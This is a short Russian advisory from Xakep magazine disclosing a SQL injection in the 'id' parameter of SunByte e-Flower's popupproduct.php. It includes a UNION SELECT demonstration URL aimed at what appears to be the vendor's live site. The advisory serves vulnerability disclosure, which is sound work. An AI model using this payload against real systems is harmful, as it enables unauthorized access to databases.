SQL-инъекция в SunByte e-Flower

Рекомендуем почитать:

Xakep #300. Номер триста

Содержание выпуска
Подписка на «Хакер»-60%

Программа: SunByte e-Flower

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «id» сценарием popupproduct.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

http://localhost/sunbyte/popupproduct.php?id=[uR eViLNeSS HeRe]

Демонстрация:

http://www.sunbyte.net/florist/popupproduct.php?id=1337+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12

SQL-инъекция в SunByte e-Flower

Xakep #300. Номер триста

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Незаметная революция. Колонка главреда

HTB Monitored. Получаем доступ в систему через Nagios XI

Виртуальная магия. Используем эмуляцию и виртуализацию для пивотинга

HTB Napper. Реверсим приложение на Go и пишем декриптор при помощи ChatGPT

Трюки

Липовый соникс. Реверсим картридж Liposonix и пишем его эмулятор

Новая диета для Linux. Загружаем современный Linux, используя минимум памяти

Фишинг в соцсетях. Как социальные сети помогают хакерам

Сделай мне красиво! Изобретаем персональный нейросетевой фотоувеличитель

Последние новости

Роутерам D-Link угрожает неисправленная RCE-уязвимость нулевого дня

Вымогатель Black Basta скомпрометировал более 500 организаций

Группировка FIN7 использует Google Ads для доставки NetSupport RAT

GhostStripe заставляет автопилот автомобилей игнорировать дорожные знаки

Обнаружен новый загрузчик хак-группы PhantomCore